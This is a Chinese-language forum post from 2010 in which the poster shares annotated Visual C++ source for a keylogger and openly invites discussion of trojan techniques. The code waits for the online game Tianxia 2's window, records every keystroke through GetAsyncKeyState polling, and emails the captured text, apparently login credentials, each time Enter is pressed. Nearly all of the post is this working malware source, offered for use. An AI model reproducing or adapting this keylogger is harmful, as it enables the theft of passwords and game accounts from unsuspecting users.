本帖最后由 无处不在 于 2010-12-25 12:22 编辑
先说明一下:
这是个vc的无DLL的钩子 是我在网上找的 一段代码 我改了改自己用了 还加了很多注释 大家研究一下吧
呵呵 把截取到的按建用邮件的方式发送出去 呵呵 欢迎交流木马技术 呵呵- char *LowerCase[]={
- "b",
- "e",
- "[ESC]",
- "[F1]",
- "[F2]",
- "[F3]",
- "[F4]",
- "[F5]",
- "[F6]",
- "[F7]",
- "[F8]",
- "[F9]",
- "[F10]",
- "[F11]",
- "[F12]",
- "`",
- "1",
- "2",
- "3",
- "4",
- "5",
- "6",
- "7",
- "8",
- "9",
- "0",
- "-",
- "=",
- "[TAB]",
- "q",
- "w",
- "e",
- "r",
- "t",
- "y",
- "u",
- "i",
- "o",
- "p",
- "[",
- "]",
- "a",
- "s",
- "d",
- "f",
- "g",
- "h",
- "j",
- "k",
- "l",
- ";",
- "\'",
- "z",
- "x",
- "c",
- "v",
- "b",
- "n",
- "m",
- ",",
- ".",
- "/",
- "\\\\",
- "[CTRL]",
- "[WIN]",
- " ",
- "[WIN]",
- "[Print Screen]",
- "[Scroll Lock]",
- "[Insert]",
- "[Home]",
- "[PageUp]",
- "[Del]",
- "[End]",
- "[PageDown]",
- "[Left]",
- "[UP]",
- "[Right]",
- "[Down]",
- "[Num Lock]",
- "/",
- "*",
- "-",
- "+",
- "0",
- "1",
- "2",
- "3",
- "4",
- "5",
- "6",
- "7",
- "8",
- "9",
- ".",
- };[/color]
- [color=red]// Upper Case Key & Some Other Keys
- char *UpperCase[]={
- "b",
- "e",
- "[ESC]",
- "[F1]",
- "[F2]",
- "[F3]",
- "[F4]",
- "[F5]",
- "[F6]",
- "[F7]",
- "[F8]",
- "[F9]",
- "[F10]",
- "[F11]",
- "[F12]",
- "~",
- "!",
- "@",
- "#",
- "\\$",
- "%",
- "^",
- "&",
- "*",
- "(",
- ")",
- "_",
- "+",
- "[TAB]",
- "Q",
- "W",
- "E",
- "R",
- "T",
- "Y",
- "U",
- "I",
- "O",
- "P",
- "{",
- "}",
- "A",
- "S",
- "D",
- "F",
- "G",
- "H",
- "J",
- "K",
- "L",
- ":",
- "\\"",
- "Z",
- "X",
- "C",
- "V",
- "B",
- "N",
- "M",
- "<",
- ">",
- ".?",
- "│",
- "[CTRL]",
- "[WIN]",
- " ",
- "[WIN]",
- "[Print Screen]",
- "[Scroll Lock]",
- "[Insert]",
- "[Home]",
- "[PageUp]",
- "[Del]",
- "[End]",
- "[PageDown]",
- "[Left]",
- "[Up]",
- "[Right]",
- "[Down]",
- "[Num Lock]",
- "/",
- "*",
- "-",
- "+",
- "0",
- "1",
- "2",
- "3",
- "4",
- "5",
- "6",
- "7",
- "8",
- "9",
- ".",
- };[/color]
- [color=red]// Ascii Keys,Forget About It
- int SpecialKeys[]={
- 8,
- 13,
- 27,
- 112,
- 113,
- 114,
- 115,
- 116,
- 117,
- 118,
- 119,
- 120,
- 121,
- 122,
- 123,
- 192,
- 49,
- 50,
- 51,
- 52,
- 53,
- 54,
- 55,
- 56,
- 57,
- 48,
- 189,
- 187,
- 9,
- 81,
- 87,
- 69,
- 82,
- 84,
- 89,
- 85,
- 73,
- 79,
- 80,
- 219,
- 221,
- 65,
- 83,
- 68,
- 70,
- 71,
- 72,
- 74,
- 75,
- 76,
- 186,
- 222,
- 90,
- 88,
- 67,
- 86,
- 66,
- 78,
- 77,
- 188,
- 190,
- 191,
- 220,
- 17,
- 91,
- 32,
- 92,
- 44,
- 145,
- 45,
- 36,
- 33,
- 46,
- 35,
- 34,
- 37,
- 38,
- 39,
- 40,
- 144,
- 111,
- 106,
- 109,
- 107,
- 96,
- 97,
- 98,
- 99,
- 100,
- 101,
- 102,
- 103,
- 104,
- 105,
- 110,
- };[/color]
- [color=red]HWND PreviousFocus=NULL;[/color]
- [color=red]BOOL IsWindowsFocusChange();
- BOOL KeyLogger();[/color]
- [color=red]bool ceshi()
- {
- do{
-
- HWND hLogin=NULL,g_hQQLogin = NULL;
- g_hQQLogin=FindWindowEx(NULL,NULL,"App","天下贰");
- // hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 进入游戏");
- if(g_hQQLogin!=0){
- MessageBox(NULL,TEXT("检测到天下2已经运行并找到进入游戏button"),"对话框窗口的标题",MB_OK);
- KeyLogger();
- }
- Sleep(1000);
-
- }while(true);
-
-
- return true;
- }[/color]
- [color=red]BOOL IsWindowsFocusChange()
- {
- HWND hFocus = GetForegroundWindow(); //取得一个句丙
- BOOL ReturnFlag = FALSE; // Declare The Return Flag
- if (hFocus != PreviousFocus)
- {
- PreviousFocus = hFocus; // Save The Old Active Windos Focus
- int WinLeng = GetWindowTextLength(hFocus); //取得窗口名称能的长度
- char *WindowCaption = (char*) malloc(sizeof(char) * (WinLeng + 2)); // Allocate Memory For The Caption
- GetWindowText(hFocus,WindowCaption,(WinLeng + 1)); // Retrieve The Active Windows\'s Caption
- if (strlen(WindowCaption) > 0) // Really Get The Windows\'s Caption
- {
- //printf("\\r\\nThe Active Windows Title: %s\\r\\n",WindowCaption);
- ReturnFlag=TRUE;
- }
- free(WindowCaption);
- }
- return ReturnFlag;
- }[/color]
- [color=red]BOOL KeyLogger()
- {
- int bKstate[256] = {0};
- int i,x;
- char KeyBuffer[600];
- int state;
- int shift; [/color]
- [color=red] memset(KeyBuffer,0,sizeof(KeyBuffer));[/color]
- [color=red] while(TRUE)
- {
- Sleep(8);
- //*************访问一个函数得到一个bool如果为真就输入一个值*****
- /*if (IsWindowsFocusChange())
- {
- if (strlen(KeyBuffer) != 0) // Keys Are Pressed
- {
- //printf("%s\\r\\n",KeyBuffer); // Display The Keys Pressed
- MessageBox(NULL,TEXT("KeyBuffer"),"",MB_OK);
- memset(KeyBuffer,0,sizeof(KeyBuffer)); // reset The Buffer
- }
- }*/
- //***************************************************************
- //********每循环一次就要判断92次是否按下了92其中一个***
- for(i=0;i<92;i++)
- {
- shift = GetKeyState(VK_SHIFT); //判断是口按下了Shift
- x = SpecialKeys[ i ]; //取得92个建中的当前一个键
- if (GetAsyncKeyState(x) & 0x8000) // 如果真的按键了
- {
-
- //*****按下了大写锁定没按shift键的即是按下了A-Z的任意键
- if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91)))
- {
- bKstate[x] = 1; //用虚拟键值的数字作为数组的位置 并给值为1
- }
- //*****************************************************
- //******按了大写锁定又按了shift即是按下了a-z的任意键
-
- else if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91)))
- {
- bKstate[x] = 2; //用虚拟键值的数字作为数组的位置 并给值为2
- }
- //************************************************
-
- else if (shift < 0) // 按下了shift键
- {
- bKstate[x] = 3; // A-Z
- }
- else
- bKstate[x] = 4; //Lowercase a-z
- }
- else//这个是没有按键盘
- {
-
- if (bKstate[x] != 0) // No Combination Keys Detected
- {
- state = bKstate[x]; // Retrieve The Current State
- bKstate[x] = 0; // Reset The Current State
- if (x == 8) //检测到删除键盘就删除其中元素
- {
- KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Then
- continue; // Start A New Loop
- }
-
- else if (strlen(KeyBuffer) > 550) // Buffer FULL
- {
-
- memset(KeyBuffer,0,sizeof(KeyBuffer)); // Reset The Buffer
- continue; // Start A New Loop
- }
-
- else if (x == 13) //如果输入的是enter就输出
- {
- if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter
- {[/color]
- [color=red] continue;
- }
-
- CString str=KeyBuffer;
- //这里我我把截取到的东西用邮件的方式发送出
- mail ml;
- ml.sendmail(str);
- memset(KeyBuffer,0,sizeof(KeyBuffer)); // Display The Keys With Enter
- continue; // Start A New Loop
- }
-
- else if ((state%2) == 1) //Must Be Upper Case Characters
- {
- strcat(KeyBuffer,UpperCase[ i ]); // Store The Key To Key Buffer
- }
-
- else if ((state%2) == 0) // Must Be Lower Case Characters找到键盘对应的按建?
- {
- strcat(KeyBuffer,LowerCase[ i ]); // Store The Key To Key Buffer
- }
- }
- }
- }
- }
- return TRUE;
- }
复制代码 |